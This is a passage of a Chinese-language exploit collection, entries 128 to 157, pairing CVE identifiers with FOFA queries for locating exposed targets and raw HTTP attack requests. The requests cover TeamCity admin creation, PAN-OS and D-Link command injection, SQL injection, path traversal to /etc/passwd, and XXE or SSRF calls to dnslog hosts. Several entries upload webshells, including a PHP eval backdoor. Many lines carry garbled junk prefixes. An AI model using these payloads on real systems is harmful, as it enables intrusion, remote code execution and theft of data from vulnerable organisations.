Sec-Purpose: prefetch;prerender
' w# O) Y' G4 Y, z, k  V9 B. e7 h
2 A5 h! x# Q$ ~$ |9 H. L------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 r7 L6 t( B6 F+ O6 y. AContent-Disposition: form-data;name="SystemName"

# |. U1 W* R+ H3 x8 Z& L, WBIM
- m$ Y$ F8 |3 A6 H! J+ z( c+ ~3 f------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ o: W& x+ x* ^/ ~Content-Disposition: form-data;name="Params"
Content-Type: text/plain
* m. f2 {$ }# [  Y
% E! i& i/ ?( d6 H1 W, ?$ r<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
- \5 ?: I+ z! S- p% K# }; q# ~0 g<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
- l! [0 t, n# ]$ T>
( m' K& R1 }! ?  V/ ]<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--



( T- x1 k! K" l128. Adobe ColdFusion 反序列化
0 m( ?; i/ z+ s; w% PCVE-2023-38203
Adobe ColdFusion版本2018u17（以及早期版本）、2021u7（以及早期版本）和2023u1（以及早期版本）
FOFA：app="Adobe-ColdFusion"
PAYLOAD

9 n( r! \8 O, `) X( `- _129. Adobe ColdFusion 任意文件读取
& V: z& T. R$ x% A% H4 L$ Y4 zCVE-2024-20767
4 {$ w1 m! g  T9 F1 p! d- ^+ \6 {FOFA：app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
& y7 V% X2 n; [0 _0 }" |第一步，获取uuid
1 H/ {$ h8 l  f2 h& JGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
2 K; _1 p3 b- e6 R& p- P3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ L" H+ r# I, F. EAccept: */*
- _+ L8 Y% z+ C8 N* q% j6 `! v4 X# KAccept-Encoding: gzip, deflate
Connection: close
5 ^; R! W3 V  B9 r; ^, L

第二步，读取/etc/passwd文件
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
1 Z0 p( t( F0 `( T! R; g4 p- [+ ~Accept-Encoding: gzip, deflate
8 N/ J# w. {; X* F# G$ F. KConnection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu客服系统任意文件上传
FOFA：icon_hash="-334624619"
$ [- P; [- P1 z5 }POST /admin/users/upavatar.html HTTP/1.1
" i9 a( n3 \1 }' B* THost: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
& T& E) p- t9 c' `% dX-Requested-With: XMLHttpRequest
3 C9 I  X" b% ]2 `7 X2 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
) ?2 x6 l# Q. s, ~3 yContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
2 b6 ]7 n+ h& j0 w* W  k, F) rAccept-Encoding: gzip, deflate
6 G( E: d+ j5 f9 K, g# YAccept-Language: zh-CN,zh;q=0.9
+ C+ [& a9 y% k2 t4 D4 zCookie: user_name=1; user_id=3
; D, o; s. s: T# q9 E7 v1 l2 zConnection: close
/ @# u$ W( q2 e  a0 R
! M  J8 k7 w5 Q; q7 i5 W  ~, l------WebKitFormBoundary3OCVBiwBVsNuB2kR
! s( F" m3 Z& c8 PContent-Disposition: form-data; name="file"; filename="1.php"
; l* l4 i. w2 s- F( J9 |  p( uContent-Type: image/png
6 T  r" ?5 A( s, }+ y9 h
<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
( W  X0 s6 ^* O$ f/ F1 R  P
  A# D, ~, O5 i  k9 b& z5 ]0 y
' R9 a; T# v) T) V0 h131. Mini-Tmall <=20231017 SQL注入
FOFA：icon_hash="-2087517259"
后台地址：http://localhost:8080/tmall/admin
( `$ B" m" j5 L0 s% }6 Jhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

9 B) {6 q9 Z  G3 M' @132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
- }, x6 I* j5 b7 DCVE-2024-27198
FOFA：body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
4 t9 X- W0 d+ z; {Host: 192.168.40.130:8111
, m8 U# L- P1 E* [( d: a6 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
8 r' M: T5 h5 S% m2 S9 Y  e$ Y* dContent-Type: application/json
Accept-Encoding: gzip, deflate
$ g5 T  {0 U; \+ `; R. |
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199
/res/../admin/diagnostic.jsp
( |# h& O' O: ~% Q, D/.well-known/acme-challenge/../../admin/diagnostic.jsp
, C% A* v( P, g: i% y# o9 ]/update/../admin/diagnostic.jsp


6 F6 X- P$ i1 L* t1 [% O2 aCVE-2024-27198-RCE.py
3 A7 Z- L- F. S. F
133. H5 云商城 file.php 文件上传
4 n! m0 E* O8 `FOFA：body="/public/qbsp.php"
6 Z, x5 v3 e$ B0 @! `POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 A) Z! h) B3 z3 Y8 C  ^Host: your-ip
$ }- W( m. y, u* A' bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

& ^0 c. V/ p, [3 U2 v------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream
  P+ C/ e$ A6 v# D6 Q' ~1 f# M5 K
<?php system("cat /etc/passwd");unlink(__FILE__);?>
, X1 X9 k+ r- F7 f' P  j2 J5 y------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
+ Q9 p; n2 o4 g& C
% M2 |. c, n" n; R

! J/ i0 w( \. V1 m  O) G0 O134. 网康NS-ASG应用安全网关index.php sql注入
CVE-2024-2330
* h! @4 |' t' ?9 }# dNetentsec NS-ASG Application Security Gateway 6.3版本
0 ~$ U* \6 R2 y( K6 Y# _: X4 e7 }FOFA：app="网康科技-NS-ASG安全网关"
; v5 {; o# I" [" t  C$ _- fPOST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
. P7 z) H$ y+ N( ^. hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
$ t/ [% f) u0 l# g& ZAccept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
2 v5 F% {3 X, D' i0 m$ k, DSec-Fetch-Dest: empty
! v' A2 y. G# u/ ESec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
$ ]! o7 E, `! {* o% `8 JTe: trailers
Connection: close
5 c3 N1 m( Z1 ]; L7 Z4 W+ JContent-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
/ ]' l  B( S* m# t

135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
9 l  t3 E" R% l- P7 @2 i" ^6 w' N5 hCVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3版本
9 d2 E1 W) n' R, oFOFA：app="网康科技-NS-ASG安全网关"
+ V+ W5 U  c7 W! s% aGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 H2 X8 C0 N# b* @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
  u: I( d' I8 n6 g( ?$ r+ ]7 B& \Accept-Language: zh-CN,zh;q=0.9
Connection: close
( R) V# x2 [* S! {( \( a$ d
- c4 f0 d# z3 W, L1 @
136. NextChat cors SSRF
% N" m9 v0 a5 i2 H% ZCVE-2023-49785
FOFA：title="NextChat"
3 B! `$ H7 x* g& @! G! ~0 T" bGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
9 {" z1 g7 z2 y! c& y5 _Host: x.x.x.x:10000
0 e. x2 a4 A- b  P$ WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
6 z8 P# h" H: ?) s: h, _8 c- YAccept-Language: en
Accept-Encoding: gzip
. F# y- E/ {0 H" i: r6 A1 s% b
& a" A, h# d5 j$ S" D# s9 b! t4 e/ v
2 U' O/ c# `! E& R* J137. 福建科立迅通信指挥调度平台down_file.php sql注入
3 q" J& @7 S* d5 m3 ZCVE-2024-2620
  F+ H9 `5 C7 X" |8 mFOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
5 H0 b1 z. r: p" \& I+ OHost: x.x.x.x
4 |% D$ s( E6 a& o. U6 y: l# `" d- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. ?4 ?' z* y6 H3 ^* C" FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ]0 M3 `7 L: k! eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
, M: \% \( K6 i0 C7 _Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1
6 m9 [- m: ?: d9 r
* k! `1 D( Y$ O( }: ]
; ?* C' k! Y7 k3 c- u9 Q! W138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
CVE-2024-2621
1 m. R# E4 @0 N. g+ ?FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
; w+ l9 n$ R5 YHost: x.x.x.x
% d* K- `5 w) W, ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Q: q+ v* T& Z0 l' C( jAccept-Encoding: gzip, deflate, br
Connection: close
( j' y# G8 Q6 ?0 YUpgrade-Insecure-Requests: 1
+ a0 P+ x6 E  B& S  y* E; k" J
& j1 B0 O  q  w& V4 B
8 R7 M5 H1 @, W139. 福建科立讯通信指挥调度平台editemedia.php sql注入
CVE-2024-2622
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
' p" `$ k* P3 ?3 YHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& h9 I  u( g4 Y, [2 P! G0 ZAccept-Encoding: gzip, deflate, br
1 H7 [( d! Y+ f* p- y( ]1 PConnection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
, h4 b4 j0 c1 n6 _6 L1 f$ MUpgrade-Insecure-Requests: 1

* x# X1 o& I7 Y- I4 y3 `0 V$ R
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
( Y5 K$ X, y" U" Y  h; HCVE-2024-2566
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
4 x+ D$ @; [7 _" M& z7 BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
+ X5 o, z4 C0 j! E8 d$ D! o+ `$ LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 Y! s. s! F/ p4 P  ~. ?Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
0 R6 |# J/ g; K7 @& F- [Upgrade-Insecure-Requests: 1
5 m4 i4 t: d) Z$ u( W6 P

, J* ^; [' ^7 d: |% ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- f& I; X, X  A3 }  |0 u$ OFOFA：body="指挥调度管理平台"
  k& Q0 M; l) D, s3 v( ?" yPOST /app/ext/ajax_users.php HTTP/1.1
, ]& [! N2 J& j' G' t" Y0 k% zHost: your-ip
( B+ ~1 M- f2 k* oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded
- U' M/ E* {5 s7 f) n) K& o
4 g  T) I1 a3 A) c( N( h9 o
  ^6 l# r5 P  {) T2 }0 ldep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
- _0 q3 k/ M3 D& x6 S% ~

6 C! R/ j* i7 A' U, |1 K* E2 \142. CMSV6车辆监控平台系统中存在弱密码
CVE-2024-29666
) A# Q3 E( g9 b5 \3 R: qFOFA：body="/808gps/"
admin/admin
' _$ G0 _6 D9 ^7 t' X. o. u( p6 d143. Netis WF2780 v2.1.40144 远程命令执行
CVE-2024-25850
FOFA：title='AP setup' && header='netis'
9 O6 w( D2 j# m9 W+ jPAYLOAD
1 e( |0 r3 {, l( u
$ ~$ G0 Z$ Q5 v. ^. u+ z) h144. D-Link nas_sharing.cgi 命令注入
! n  O+ J% }$ V, K( r4 \. rFOFA：app="D_Link-DNS-ShareCenter"
system参数用于传要执行的命令
! p1 Q* y4 L/ Q) u4 M, mGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
2 z2 q0 W0 u) ?Connection: close
, J. s- `# l7 N0 LAccept: */*
. e4 p6 E3 s$ x. kAccept-Language: en
- v) S& v8 z" c( gAccept-Encoding: gzip
% K' ^2 A) H2 k, K
& s4 E( B* o, y8 {/ G
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
5 A: l1 w6 V& t( s: v0 dCVE-2024-3400
FOFA：icon_hash="-631559155"
5 _: I9 Y% k* A) o! e. lGET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
  f+ S. M! M. X9 L) t+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip
" g$ @; h( {* Z* m

: e7 Z- V6 X  ?  ?2 W9 v+ ^& |146. MajorDoMo thumb.php 未授权远程代码执行
CNVD-2024-02175
# h9 [4 {0 r* J! pFOFA：app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
# C( }2 h7 v1 YHost: x.x.x.x
1 c* @$ A8 c" `( S' }; N8 W5 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
. W8 ^1 W  e0 n% }* z' yAccept-Charset: utf-8
- ^( ^" h9 ?1 T0 DAccept-Encoding: gzip, deflate
Connection: close

9 j' X$ ?" j/ t
: q, x6 v% P5 L+ e4 d9 E7 c, |9 J147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
CVE-2024-32399
8 g# g; s- S' u) x+ O" mFOFA：body="RaidenMAILD"
. b4 C0 V7 w3 [/ n( }8 F# Y: qGET /webeditor/../../../windows/win.ini HTTP/1.1
" ^: l$ w0 s( v; \! J3 C/ ^Host: 127.0.0.1:81
Cache-Control: max-age=0
6 V! a' e+ O7 gConnection: close


148. CrushFTP 认证绕过模板注入
6 c, R. T' H, t! MCVE-2024-4040
FOFA：body="CrushFTP"
PAYLOAD

149. AJ-Report开源数据大屏存在远程命令执行
FOFA：title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& l" Y" }  }8 x% T9 u3 {Host: x.x.x.x
! \  Y& g* d" T/ E9 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 h9 P; e6 Z& F# z4 E* tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ J5 T' C) L) C3 r# FAccept-Encoding: gzip, deflate, br
6 u# t1 v( t$ B* l! v9 J; BAccept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
; i1 _+ o. i6 n
0 R8 ]' B5 {1 V1 e' Z/ \{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- N8 W) u) B2 y: S/ ]
# o8 M. R# u9 A3 O2 o, E150. AJ-Report 1.4.0 认证绕过与远程代码执行
FOFA：title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& v! T8 n& x8 X  NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
. R3 @+ Y' g0 g3 Y) ?Content-Length: 339

6 O* ^8 y* I& }/ |% R% C/ Z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) b) n* p. @1 N7 {9 |! o- v
' e. F; a. o: u1 j4 Q; O+ ~
+ A) A+ ~7 O, M6 M: j# }* T151. AJ-Report 1.4.1 pageList sql注入
" K( o+ B- y8 m/ t1 m1 xFOFA：title="AJ-Report"
) p  _* i( j7 Y4 sGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
* @3 ~, `, B+ M0 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
0 A' g- T5 B9 _Accept-Encoding: gzip


. W$ G% L& A- B! t/ K- Z152. Progress Kemp LoadMaster 远程命令执行
5 `/ k: E8 H/ i8 i3 JCVE-2024-1212
- F$ q! L2 y5 H* K/ k5 q) z. ELoadMaster <= 7.2.59.2 (GA)
LoadMaster<=7.2.54.8 (LTSF)
' U. ]) @" B2 t7 n6 D. k% S( uLoadMaster <= 7.2.48.10 (LTS)
FOFA：body="LoadMaster"
3 D" l5 J* s  G9 SJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
9 I3 M/ q, F( KGET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
3 I% u. L2 a$ w; BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
( R& F4 ^: X; U* ?6 ]Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


! C4 h! r8 C# b3 }- n6 g2 Z153. gradio任意文件读取
' f; D/ W: {3 O2 `  @* b+ yCVE-2024-1561FOFA：body="__gradio_mode__"
第一步，请求/config文件获取componets的id
http://x.x.x.x/config


第二步，将/etc/passwd的内容写入到一个临时文件
POST /component_server HTTP/1.1
Host: x.x.x.x
% h3 j3 j% H7 v) k. b8 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
0 i: R! N& o$ G! M- r* K( ?9 FContent-Type: application/json
& F& g1 q. G! \0 TAccept-Encoding: gzip

/ a+ k; t& W  z* E3 g0 i{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
0 U2 _3 n" A; G9 g
% d  }& @( E! J: D/ ~. C
0 O# T+ s" D. j1 A& q, s$ S第三步访问
4 v" i9 l) }/ u; x7 S* |http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. 天维尔消防救援作战调度平台 SQL注入
$ N7 e$ t( Z; K8 `CVE-2024-3720FOFA：body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
8 h& ~  [* j  D) @, W# |+ rHost: x.x.x.x
& _& m3 o2 h7 R. ]1 zContent-Length: 106
% {/ i: L, f  Y/ ^/ k% S4 [) w/ RCache-Control: max-age=0
Upgrade-Insecure-Requests: 1
  U) J. f( s; y% e, I. K9 f0 ZOrigin: http://x.x.x.x
Content-Type: application/json
$ F0 Z  c. S& n; t6 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- R( f3 h" O3 P/ h3 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  y/ m2 G5 m* eReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
% u8 t4 _6 \( i6 ]% o9 `2 z: u3 HAccept-Encoding: gzip, deflate
  @4 l" l$ `$ u3 ~# tAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

2 [) E" a: n# F0 ^3 A: S: m! v2 c8 A{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
6 |( y( {9 d( v1 p8 S7 Y! y

155. 六零导航页 file.php 任意文件上传
- R+ ^/ }% |! ]) F1 i9 L. h/ p3 n' gCVE-2024-34982
FOFA：title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
4 F3 T4 }2 q8 ^/ X* j/ g0 EHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; ^3 T: V2 k8 j! C6 l  r* x! yConnection: close
+ J; P' m: @; l2 \3 ^, d0 g, F8 wContent-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
. _& G+ \5 j' J8 `Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 e/ v9 E9 s- E; w1 QContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
' C' }2 G7 A6 p8 JX-Requested-With: XMLHttpRequest
5 b( E' t$ r5 A2 m% Y' _
3 T6 b2 u( J, C3 Q7 ?+ d- c-----------------------------qttl7vemrsold314zg0f
$ N0 v" P. C/ ^! A# N; FContent-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png
, @! u  Q4 O$ m; k* g" |; F* [
<?php phpinfo();unlink(__FILE__);?>
7 O' W2 I8 P% H/ M6 A( j-----------------------------qttl7vemrsold314zg0f--
& h' ]! s- f4 X1 v+ b- @
$ g5 X3 ^) m/ t! m0 R
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

# w4 l5 q; B7 \) t156. TBK DVR-4104/DVR-4216 操作系统命令注入
) A5 `3 v9 P" k! c+ x+ @CVE-2024-3721
FOFA："Location: /login.rsp"
·TBK DVR-4104
: v8 G# V$ x" m  d6 |·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
* N$ Q' e' N" S3 |; sHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
( l, x) |& ], b# d# VContent-Length: 0
Cookie: uid=1
% |9 I1 ~7 }" cAccept-Encoding: gzip


157. 美特CRM upload.jsp 任意文件上传
CNVD-2023-06971
  `) P  c$ r* D; k" E5 PFOFA：body="/common/scripts/basic.js"
% q+ ~) c# s6 O5 F; VPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
7 ~; ^! b( Q1 r" y7 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1
. ], a; \) W; r% i  Y! Q
------WebKitFormBoundary1imovELzPsfzp5dN
& ^+ t" u4 q& |, Z: s5 W7 ?4 n3 u* bContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

& y  `6 _/ ?1 Xnyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"
) A7 @5 C" @& r3 W$ f  t
null
+ E3 v) j, v6 y/ F$ }1 n; l------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
9 a6 `. f" A& J. F3 G4 f------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"
/ Y0 N; E4 C4 d" S& a/ X) C# C2 R
8 l: T( H; S- F" z1 V6 \null
------WebKitFormBoundary1imovELzPsfzp5dN
